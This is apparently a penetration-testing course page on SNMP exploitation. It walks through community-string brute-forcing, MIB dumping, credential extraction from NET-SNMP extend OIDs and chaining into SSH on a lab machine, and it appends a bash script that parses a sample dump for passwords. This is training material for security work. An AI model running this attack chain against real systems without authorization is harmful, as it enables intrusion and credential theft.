⭐ Premium Path · Protocol Exploitation

SNMP Exploitation Mastery

Two modules. Community string discovery to root shell. Walk the full MIB tree, extract credentials from NET-SNMP extend OIDs, and chain directly into SSH — all against a live machine.

2 Modules · 1 Machine · Premium

The SNMP Attack Methodology

SNMP listens on UDP/161, so a TCP-only scanner never sees it. These four phases take you from discovery to root.

Phase 1 — UDP Discovery

SNMP is UDP/161, so a TCP-only nmap scan returns nothing. Always include -sU -p 161 in the initial reconnaissance pass. A UDP port that does not answer is reported as open|filtered; the snmp-info script sends an SNMPv3 discovery request, which needs no community string, so it confirms the service is really there before you start guessing strings.

nmap -sU -p 161 TARGET
nmap -sU -p 161 \
  --script snmp-info TARGET

Phase 2 — Community String

The default read community is public (the default write community is private). Try the common strings by hand first (public, private, manager, community); only then brute-force with onesixtyone, which takes the wordlist with -c and the host as its last argument (use -i hosts.txt for a list of hosts).

onesixtyone -c \
  /usr/share/seclists/Discovery/SNMP/snmp.txt \
  TARGET

Phase 3 — Full MIB Walk

Dump the entire OID tree and save it. You will grep it repeatedly. Use -On so OIDs are printed numerically; without loaded MIBs the default output prefixes every line with iso.3.6..., and numeric OIDs are what you grep for anyway. The NET-SNMP extend branch (.1.3.6.1.4.1.8072.1.3.2) is the credential goldmine.

snmpwalk -v2c -c public -On \
  TARGET .1.3.6 > /tmp/mib.txt
wc -l /tmp/mib.txt

Phase 4 — Extract & Chain

Parse the saved output for credential fragments. Correlate sysContact (a name or e-mail address that gives you the username) with the extend entries (the extension's command-line arguments or its output often carry the password). SSH in with that pair and enumerate sudo rights.

grep -iE 'pass|user|key|cred' \
  /tmp/mib.txt
ssh USER@TARGET
sudo -l

The Two Modules

Complete Module 1 before Module 2. Both target the same machine — Walkabout.

Module 1 · 📡

SNMP — MIB Walking & Community String Discovery

SNMP runs on UDP/161 and is invisible to TCP-only scans. With the default community string 'public', a full MIB walk hands you the running process list, installed software, network interfaces, routing tables, and — often — clear-text credentials stored in OID values.

  • nmap -sU -p 161 --script snmp-info,snmp-sysdescr TARGET (UDP discovery)
  • snmpwalk -v2c -c public TARGET .1.3.6 (full MIB dump, OID tree root)
  • snmpwalk -v2c -c public TARGET system (system OID: sysDescr, sysName, sysLocation)
  • onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt TARGET (community brute-force)
  • snmp-check TARGET -c public (human-readable output, parses common OIDs)
  • braa public@TARGET:.1.3.6.* (fast multi-target SNMP sweep; the query syntax is community@host:oid, and a trailing * walks the subtree)
  • Navigating the MIB tree: .1.3.6.1.2.1.1 (system), .1.3.6.1.2.1.25 (host), .1.3.6.1.4.1 (enterprise)
  • NET-SNMP extend OID: .1.3.6.1.4.1.8072.1.3.2 (user-defined extensions — credential goldmine)
Tools: snmpwalk, snmp-check, onesixtyone, braa, nmap
🔒 Premium Content: hands-on assignments for this module are available to Premium members.
Module 2 · 🚪

SNMP — Credential Extraction & Foothold

SNMP data alone is not a shell. The skill is in parsing: correlating a username from sysContact, a password from a NET-SNMP extend value, and using those together on SSH. Learn to extract signal from thousands of OID lines — fast.

  • Grepping SNMP output: snmpwalk ... | grep -iE 'pass|user|cred|key|secret|login'
  • NET-SNMP extend credential leak: parsing nsExtendOutputFull at .1.3.6.1.4.1.8072.1.3.2.3.1.2 (the extension's complete output) and nsExtendArgs at .1.3.6.1.4.1.8072.1.3.2.2.1.3 (passwords passed on the extension's command line); walk just .1.3.6.1.4.1.8072.1.3.2 when you only want this branch
  • Correlating sysContact / sysLocation / sysName for username hints
  • Using snmpwalk with -Oa (print as ASCII) for human-readable string OIDs
  • snmpget for targeted OID reads: snmpget -v2c -c public TARGET OID
  • Windows account enumeration over SNMP: auxiliary/scanner/snmp/snmp_enumusers (Metasploit; reads the Windows user table, it does not enumerate SNMPv3 users)
  • Converting numeric OIDs to names with MIB files: -m ALL (on Debian/Kali install snmp-mibs-downloader and comment out the "mibs :" line in /etc/snmp/snmp.conf, otherwise the walk prints iso.3.6... instead of names)
  • Full chain: snmpwalk → grep credentials → ssh USER@TARGET
Tools: snmpwalk, snmpget, snmp-check, metasploit, ssh
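The Phase 4 correlation and the Module 2 parsing steps, as an added example that is not part of the course material or of any tool named above. It assumes the walk was saved with numeric OIDs (snmpwalk -v2c -c public -On TARGET .1.3.6 > /tmp/mib.txt). The embedded dump is constructed sample data: the host name, the contact address, the extension name "backup", the script path and the password are all made up for illustration, not output from Walkabout.

```bash
#!/usr/bin/env bash
# Added example, not course material: parse a saved snmpwalk dump the way
# Phase 4 / Module 2 describe, correlating sysContact with the NET-SNMP
# extend tables.  Assumes the dump was taken with numeric OIDs:
#   snmpwalk -v2c -c public -On TARGET .1.3.6 > /tmp/mib.txt
set -u

# CONSTRUCTED sample dump (hostname, contact, extension name, path and
# password are invented for illustration; not output from any real host).
SAMPLE_MIB='.1.3.6.1.2.1.1.1.0 = STRING: "Linux walkabout 5.15.0-generic x86_64"
.1.3.6.1.2.1.1.4.0 = STRING: "Admin <sysadmin@example.invalid>"
.1.3.6.1.2.1.1.5.0 = STRING: "walkabout"
.1.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
.1.3.6.1.4.1.8072.1.3.2.2.1.2.6.98.97.99.107.117.112 = STRING: "/usr/local/bin/backup.sh"
.1.3.6.1.4.1.8072.1.3.2.2.1.3.6.98.97.99.107.117.112 = STRING: "--user backupsvc --password Hunter2!"
.1.3.6.1.4.1.8072.1.3.2.3.1.2.6.98.97.99.107.117.112 = STRING: "backup finished"
.1.3.6.1.4.1.8072.1.3.2.3.1.4.6.98.97.99.107.117.112 = INTEGER: 0'
MIB_FILE=$(mktemp)            # left in place so the functions can be re-run on it
printf '%s\n' "$SAMPLE_MIB" > "$MIB_FILE"

# snmp_value <exact OID> <dump>: one scalar's value without the "= TYPE:"
# prefix and surrounding quotes (what snmpget would give you, but offline).
snmp_value() {
  awk -v oid="$1" '
    index($0, oid " = ") == 1 {
      sub(/^[^=]*= [A-Za-z0-9-]+: ?/, "")
      gsub(/^"|"$/, "")
      print
    }' "$2"
}

# user_candidates <sysContact string>: login-name guesses, one per line.
# "Admin <sysadmin@example.invalid>" -> admin, sysadmin
user_candidates() {
  printf '%s\n' "$1" | awk '{
    n = split(tolower($0), w, /[^a-z0-9@._-]+/)
    for (i = 1; i <= n; i++) { sub(/@.*/, "", w[i]); if (w[i] != "") print w[i] }
  }' | sort -u
}

# extend_table <dump>: one line per NET-SNMP extend entry as
# name<TAB>command<TAB>args<TAB>full-output.  The extend tables are indexed
# by the extension name encoded as <length>.<byte>.<byte>..., so the name is
# decoded straight from the OID.  Columns: .2.1.2 nsExtendCommand,
# .2.1.3 nsExtendArgs, .3.1.2 nsExtendOutputFull.  (A multi-line output
# continues on following lines of the dump; only its first line is kept.)
extend_table() {
  awk '
    function val(s) { sub(/^[^=]*= [A-Za-z0-9-]+: ?/, "", s); gsub(/^"|"$/, "", s); return s }
    function decode(idx,   b, n, i, name) {
      n = split(idx, b, "."); name = ""
      for (i = 2; i <= b[1] + 1; i++) name = name sprintf("%c", b[i] + 0)
      return name
    }
    /^\.1\.3\.6\.1\.4\.1\.8072\.1\.3\.2\.[23]\.1\.[23]\./ {
      rest = substr($1, length(".1.3.6.1.4.1.8072.1.3.2.") + 1)   # "2.1.3.6.98.97..."
      split(rest, p, ".")
      idx = substr(rest, length(p[1] "." p[2] "." p[3] ".") + 1)   # "6.98.97.99.107.117.112"
      v[idx, p[1] "." p[3]] = val($0)
      seen[idx] = 1
    }
    END {
      for (idx in seen)
        printf "%s\t%s\t%s\t%s\n", decode(idx), v[idx, "2.2"], v[idx, "2.3"], v[idx, "3.2"]
    }' "$1"
}

# report <dump>: the whole Phase 4 correlation in one place.
report() {
  contact=$(snmp_value .1.3.6.1.2.1.1.4.0 "$1")
  echo "sysName     : $(snmp_value .1.3.6.1.2.1.1.5.0 "$1")"
  echo "sysContact  : $contact"
  echo "user guesses: $(user_candidates "$contact" | tr '\n' ' ')"
  echo "extend entries (name|command|args|output):"
  extend_table "$1" | tr '\t' '|'
  echo "credential-looking extend fields:"
  extend_table "$1" | grep -iE 'pass|pwd|secret|key|token|cred' || echo "(none)"
}

report "$MIB_FILE"
# Next step is manual: ssh <guess>@TARGET with the recovered password, then sudo -l.
```

Run it as-is to see the report on the embedded sample; against a real engagement, drop the sample block and call report /tmp/mib.txt. The grep pattern is deliberately wider than the page's pass|user|key|cred because extend arguments (nsExtendArgs) leak passwords at least as often as the command output does, and they are the column most people forget to read.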